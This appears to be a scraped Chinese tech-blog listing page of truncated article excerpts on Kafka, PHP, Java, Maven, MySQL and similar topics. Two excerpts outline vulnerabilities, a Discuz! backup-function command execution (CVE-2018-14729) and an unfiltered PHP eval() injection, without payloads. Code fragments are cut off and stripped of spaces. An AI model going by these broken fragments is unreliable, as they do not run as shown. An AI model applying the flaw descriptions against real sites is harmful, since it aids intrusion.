Kafka是一个开源的分布式事件流平台（EventStreamingPlatform），由LinkedIn公司最初采用Scala语言开发，并基于ZooKeeper协调管理。如今，Kafka已经被Apache基金会纳入其项目体系，广泛应用于大数据实时处理领域。Kafka凭借其高吞吐量、持久化、分布式和可靠性的特点，成为构建实时流数据管道和流处理应用程序的重要工具。Kafka架构Kafka的架构主要由
分享一个基于python的电子书数据采集与可视化分析 hadoop电子书数据分析与推荐系统 spark大数据毕设项目（源码、调试、LW、开题、PPT) 计算机源码社 Python项目大数据大数据 python hadoop 计算机毕业设计选题计算机毕业设计源码数据分析 spark毕设
作者：计算机源码社个人简介：本人八年开发经验，擅长Java、Python、PHP、.NET、Node.js、Android、微信小程序、爬虫、大数据、机器学习等，大家有这一块的问题可以一起交流！学习资料、程序开发、技术解答、文档报告如需要源码，可以扫取文章下方二维码联系咨询Java项目微信小程序项目Android项目Python项目PHP项目ASP.NET项目Node.js项目选题推荐项目实战|p
php服务器状态监测,PHP网站状态在线监控源码傲雪吟霜白如冰 php服务器状态监测
在网上找的一个在线监控源码，比较简单，但是功能也略有不足，例如如果网站挂了就按照监控频率一直发邮件提示，网站恢复之后不会发邮件通知；不能直接填写要监控的网址或者某一页面，适合监控大量的网站或者vps、服务器。最新使用感受：没有发送邮件限制，我设置监控频率是一个小时，一天没管就把邮箱塞满了。如果服务器恢复的话不会专门发邮件提醒。如果只是监控几个站的话有很多免费的监控网站可以使用，只是使用数量上有限制
php状态监控源码,PHP服务器状态监控实现程序江子星 php状态监控源码
*/header('Content-type:text/html;charset=utf-8');include'./smtp/class.smtp.php';include'./smtp/class.phpmailer.php';functionsendmail($subject='',$body=''){date_default_timezone_set('Asia/Shanghai');//
服务器状态监控php源码,服务器状态监控_监控Linux服务器网站状态的SHELL脚本温糯米服务器状态监控php源码
摘要腾兴网为您分享:监控Linux服务器网站状态的SHELL脚本，蜗牛集市，同花顺，探客宝，手柄助手等软件知识，以及日期倒计时插件，云南省教育资源公共，rui手机桌面，小屁孩桌面便签，合金装备崛起复仇，朝夕日历，photoshop图像处理软件,一年级学生每日计划表，悟空找房，饿了吗外卖商家版，逃生，中国民宿网，realpolitiks，交通安全知识竞赛，雅思流利说等软件it资讯，欢迎关注腾兴网。1
java 技术架构相关文档圣心 java 架构开发语言
在Java中，有许多不同的技术和架构，这里我将列举一些常见的Java技术和架构，并提供一些相关的文档资源。SpringFrameworkSpring是一个开源的Java/JavaEE全功能框架，以Apache许可证形式发布，提供了一种实现企业级应用的方法。官方文档：SpringFrameworkSpringBootSpringBoot是Spring的一个子项目，旨在简化创建生产级的Spring应用
数据仓库介绍阿龙的代码在报错数据分析数据仓库数据库
数据仓库数据仓库的概念数据仓库的主要特征数据仓库的主流开发语言-sql结构化数据sql语句数据仓库的概念数据仓库（英语：DataWarehouse，简称数仓、DW）,是一个用于存储、分析、报告的数据系统。数据仓库的目的是构建面向分析的集成化数据环境，分析结果为企业提供决策支持（DecisionSupport）。就是数据仓库只分析数据并不产生数据数据仓库的主要特征1、面向主题主题是一个抽象的概念，是
php 实现JWT 每天瞎忙的农民工 php php
在PHP中，JSONWebToken(JWT)是一种开放标准(RFC7519)用于在各方之间作为JSON对象安全地传输信息。JWT通常用于身份验证系统，如OAuth2或基于令牌的身份验证。以下是一个基本的PHP实现JWT生成和验证的代码示例。JWT的组成部分JWT包含三个部分：Header（头部）：说明算法和令牌类型。Payload（有效载荷）：包含声明（如用户数据、过期时间等）。Signatur
外卖霸王餐返利外卖会员卡小程序开发闹小艾 good506070 微信小程序小程序
外卖霸王餐返利外卖会员卡小程序开发"社交电商赋能下的外卖返利小程序"是专为商家与用户双赢而设计的创新平台。以下是其开发方案的详细步骤：一、需求梳理：首先，我们需要明确小程序的核心功能和特色。包括设定活动类型、返利策略，以及用户体验友好的界面设计。二、技术决策：技术选型是关键。我们采用小程序的开发框架，利用JavaScript作为前端开发语言，并结合微信提供的API进行后端接口调用与数据处理。三、账
discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729) weixin_39740419 discuz 讲解
0x00漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz!1.5-2.50x01漏洞复现官方论坛下载相应版本就好。0x02漏洞分析需要注意的是这个漏洞其实是需要登录后台的，并且能有数据库备份权限，所以比较鸡肋。我这边是用Discuz!2.5完成漏洞复现的，并用此进行漏洞分析的。漏洞点在：so
FastCGI结合docker下的Nginx执行shell脚本南波波 nginx docker
1使用docker下载Nginx下面展示一些内联代码片。a.#dockerpullnginx#dockerrun--namerunoob-php-nginx-p8088:80-d\-v~/nginx/www:/usr/share/nginx/html:ro\-v~/nginx/conf/conf.d:/etc/nginx/conf.d:ro\nginxb.在~/nginx/conf/conf.d创
Apache Shiro安全框架(2)-用户认证 heyrian Java shiro
身份认证在shiro中用户需要提供用户的principals（身份）和credentials（证明）来证明该用户属于当前系统用户。常见的认证方式即用户名/密码。在解释身份认证之前，我们先来看看shiro中的Subject和Realm,这是身份认证的两个关键的概念。Subjectsubject代表当前用户，内部主要维护当前用户信息。shiro中所有的subject都交给SecurityManager
Apache HBase基础（基本概述，物理架构，逻辑架构，数据管理，架构特点，HBase Shell） May--J--Oldhu HBase HBase shell hbase物理架构 hbase逻辑架构 hbase
NoSQL综述及ApacheHBase基础一.HBase1.HBase概述2.HBase发展历史3.HBase应用场景3.1增量数据-时间序列数据3.2信息交换-消息传递3.3内容服务-Web后端应用程序3.4HBase应用场景示例4.ApacheHBase生态圈5.HBase物理架构5.1HMaster5.2RegionServer5.3Region和Table6.HBase逻辑架构-Row7.
Flume：大规模日志收集与数据传输的利器傲雪凌霜，松柏长青后端大数据 flume 大数据
Flume：大规模日志收集与数据传输的利器在大数据时代，随着各类应用的不断增长，产生了海量的日志和数据。这些数据不仅对业务的健康监控至关重要，还可以通过深入分析，帮助企业做出更好的决策。那么，如何高效地收集、传输和存储这些海量数据，成为了一项重要的挑战。今天我们将深入探讨ApacheFlume，它是如何帮助我们应对这些挑战的。一、Flume概述ApacheFlume是一个分布式、可靠、可扩展的日志
【免费】springboot项目申报管理系统|毕业设计|Javaweb项目计算机学姐来啦 springboot ssm java spring boot 课程设计后端毕设毕业设计 java-ee
收藏点赞不迷路关注作者有好处编号：springboot375springboot项目申报管理系统开发语言：Java数据库：MySQL技术：Spring+SpringMVC+MyBatis工具：IDEA/Ecilpse、Navicat、Maven1.万字文档展示(部分)2.系统图片展示第5章系统详细设计5.1管理员功能模块的实现5.1.1项目列表如图5.1显示的就是项目列表页面，此页面提供给管理员的
《C++语言的设计和演化》读书感悟（一）依晴无旧 C\C++java 开发语言
写了一百多篇技术文章了，我突然想写一下和技术文搭一点关系的语言发展设计的文章，《C++语言的设计和演化》是我无聊翻自己库存电子书找到了，因为当年看这本书是C++之父写的，所以就保存下来，但是当时主要学习C++，这本书更多是C++之父从本身出发，对C++设计和演化的观点和感想，所以当时就被我扔去吃灰了。现在重拾起来，读起来别有风味。开发语言，虽然很多，但是万变不离其宗，学进去了，无非就是数据类型、控
什么是 PHP? 为什么用 PHP? 谁在用 PHP? m0_37438181 永远学习 php 开发语言
一、什么是PHP？PHP（HypertextPreprocessor，超文本预处理器）是一种广泛应用于Web开发的通用开源脚本语言。PHP主要用于服务器端编程，可以嵌入HTML中，与数据库进行交互，生成动态网页内容。它具有以下特点：简单易学：语法相对简单，容易上手，对于初学者来说是一个不错的选择。跨平台性：可以在多种操作系统上运行，如Windows、Linux、Unix等。丰富的函数库：提供了大量
Superset二次开发之源码DependencyList.tsx 分析 aimmon Superset二次开发 Superset BI 二次开发 typescript 前端
功能点路径superset-frontend\src\dashboard\components\nativeFilters\FiltersConfigModal\FiltersConfigForm\DependencyList.tsx/***LicensedtotheApacheSoftwareFoundation(ASF)underone*ormorecontributorlicenseagre
史上最全的maven的pom.xml文件详解 Meta999 Maven
注：详解文件中，用红色进行标注的是平常项目中常用的配置节点。要详细学习！转载的，太经典了、、、、欢迎收藏xxxxxxxxxxxx4.0.0xxxxxxjar1.0-SNAPSHOTxxx-mavenhttp://maven.apache.orgAmavenprojecttostudymaven.jirahttp://jira.baidu.com/[email protected]
【网络安全】漏洞挖掘：php代码审计秋说网络安全 php web安全漏洞挖掘
未经许可，不得转载。文章目录正文正文在应用程序中，通过一个JavaScript注释发现了一个备份ZIP文件。解压后，获取了应用程序的代码，其中包含如下代码片段：代码首先检查变量$action是否等于'convert'，如果是，则继续执行。随后对传入的变量$data使用trim()函数去除两端空白字符，并使用eval()函数执行$data的内容。显然，代码对$data没有进行任何过滤或验证，因此可以
eclipse maven IXHONG eclipse
eclipse中使用maven插件的时候，运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match. 可以设一个环境变量M2_HOME指
timer cancel方法的一个小实例 alleni123 多线程 timer
package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
MySQL数据库在Linux下的安装 ducklsl mysql
1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户，添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置，生成并安装MySQL >cmake -D
spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 spring bean
将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3
maven发布第三方jar的一些问题 cugfy maven
maven中发布第三方jar到nexus仓库使用的是 deploy:deploy-file命令有许多参数，具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子： mvn deploy:deploy-file -DgroupId=xpp3
MYSQL下载及安装 357029540 mysql
好久没有去安装过MYSQL，今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题，因为的的MYSQL是最新版本为5.6.24，所以下载的文件夹里没有my.ini文件，所以在网上找了很多方法还是没有找到怎么解决问题，最后看到了一篇百度经验里有这个的介绍，按照其步骤也完成了安装，在这里给大家分享下这个链接的地址
ios TableView cell的布局张亚雄 tableview
cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]]; CGSize itemSize = CGSizeMake(60, 50); &nbs
Java编码转义 adminjun java 编码转义
import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符，也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
Tomcat 配置和spring aijuans spring
简介 Tomcat启动时，先找系统变量CATALINA_BASE，如果没有，则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹，从中读取配置文件。最重要的配置文件：server.xml 。要配置tomcat，基本上了解server.xml，context.xml和web.xml。 Server.xml -- tomcat主
Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归 File
其实这个没啥技术含量，大湿们不要操笑哦，只是做一个简单的记录，简单用了一下递归算法。 import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
linux安装mysql出现libs报冲突解决 BigBird2012 linux
linux安装mysql出现libs报冲突解决安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686
jedis连接池使用实例 bijian1013 redis jedis连接池 jedis
实例代码： package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
关于朋友 bingyingao 朋友兴趣爱好维持
成为朋友的必要条件：志相同，道不合，可以成为朋友。譬如马云、周星驰一个是商人，一个是影星，可谓道不同，但都很有梦想，都要在各自领域里做到最好，当他们遇到一起，互相欣赏，可以畅谈两个小时。志不同，道相合，也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一，一个成绩很差的同学是好朋友。他们志向不相同，但他
【Spark七十九】Spark RDD API一 bit1129 spark
aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
ktap 0.1 released bookjovi kernel tracing
Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
能保存Properties文件注释的Properties工具类 BrokenDreams properties
今天遇到一个小需求：由于java.util.Properties读取属性文件时会忽略注释，当写回去的时候，注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下，但修改了之后注释全没了，可能会给以后的参数调整带来困难。所以要解决这个问题。 &nb
读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义： * Facade（外观）模式为子系统中的各类（或结构与方法）提供一个简明一致的界面， * 隐藏子系统的复杂性，使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
After Effects教程收集 cherishLC After Effects
1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程（中文字幕） http://www.youku.com/playlist_show/id_17893193.html 英文原址： http://www.videocopilot.net/basic/ 素
Linux Apache 安装过程 crabdave apache
Linux Apache 安装过程下载新版本： apr-1.4.2.tar.gz（下载网站：http://apr.apache.org/download.cgi） apr-util-1.3.9.tar.gz（下载网站：http://apr.apache.org/download.cgi） httpd-2.2.15.tar.gz（下载网站：http://httpd.apac
Shell学习之变量赋值和引用 daizj shell 变量引用赋值
本文转自：http://www.cnblogs.com/papam/articles/1548679.html Shell编程中，使用变量无需事先声明，同时变量名的命名须遵循如下规则：首个字符必须为字母（a-z，A-Z）中间不能有空格，可以使用下划线（_）不能使用标点符号不能使用bash里的关键字（可用help命令查看保留关键字）需要给变量赋值时，可以这么写：
Java SE 第一讲（Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行） dcj3sjt126com java jdk
Java SE 第一讲： Java SE：Java Standard Edition Java ME: Java Mobile Edition Java EE：Java Enterprise Edition Java是由Sun公司推出的（今年初被Oracle公司收购）。收购价格：74亿美金 J2SE、J2ME、J2EE JDK：Java Development
YII给用户登录加上验证码 dcj3sjt126com yii
1、在SiteController中添加如下代码： /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
Lucene使用说明 dyy_gusi Lucene search 分词器
Lucene使用说明 1、lucene简介 1.1、什么是lucene Lucene是一个全文搜索框架，而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用，它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么要回答这个问题，先要了解lucene的本质。实际
学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
不论你是想自己设计游戏，还是开发iPhone或安卓手机上的应用，还是仅仅为了娱乐，学习编程语言都是一条必经之路。编程语言种类繁多，用途各异，然而一旦掌握其中之一，其他的也就迎刃而解。作为初学者，你可能要先从Java或HTML开始学，一旦掌握了一门编程语言，你就发挥无穷的想象，开发各种神奇的软件啦。 1、确定目标学习编程语言既充满乐趣，又充满挑战。有些花费多年时间学习一门编程语言的大学生到
Java面试十问之三：Java与C++内存回收机制的差别 HNUlanwei java C++finalize()堆栈内存回收
大家知道， Java 除了那 8 种基本类型以外，其他都是对象类型（又称为引用类型）的数据。 JVM 会把程序创建的对象存放在堆空间中，那什么又是堆空间呢？其实，堆（ Heap）是一个运行时的数据存储区，从它可以分配大小各异的空间。一般，运行时的数据存储区有堆（ Heap）和堆栈（ Stack），所以要先看它们里面可以分配哪些类型的对象实体，然后才知道如何均衡使用这两种存储区。一般来说，栈中存放的
第二章 Nginx+Lua开发入门 jinnianshilongnian nginx lua
Nginx入门本文目的是学习Nginx+Lua开发，对于Nginx基本知识可以参考如下文章： nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
MongoDB windows安装基本命令 liyonghui160com
windows安装安装目录： D:\MongoDB\ 新建目录 D:\MongoDB\data\db 4.启动进城： cd D:\MongoDB\bin mongod -dbpath D:\MongoDB\data\db &n
Linux下通过源码编译安装程序 pda158 linux
一、程序的组成部分　　Linux下程序大都是由以下几部分组成：　　二进制文件：也就是可以运行的程序文件　　库文件：就是通常我们见到的lib目录下的文件　　配置文件：这个不必多说，都知道　　帮助文档：通常是我们在linux下用man命令查看的命令的文档　　二、linux下程序的存放目录　　linux程序的存放目录大致有三个地方：　　/etc, /b
WEB开发编程的职业生涯４个阶段 shw3588 编程 Web 工作生活
觉得自己什么都会 2007年从学校毕业，凭借自己原创的ASP毕业设计，以为自己很厉害似的，信心满满去东莞找工作，找面试成功率确实很高，只是工资不高，但依旧无法磨灭那过分的自信，那时候什么考勤系统、什么OA系统、什么ERP，什么都觉得有信心，这样的生涯大概持续了约一年。根本不是自己想的那样 2008年开始接触很多工作相关的东西，发现太多东西自己根本不会，都需要去学，不管是asp还是js，
遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp 同域post
今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv '])); 贴出我前端代码片段: $.aj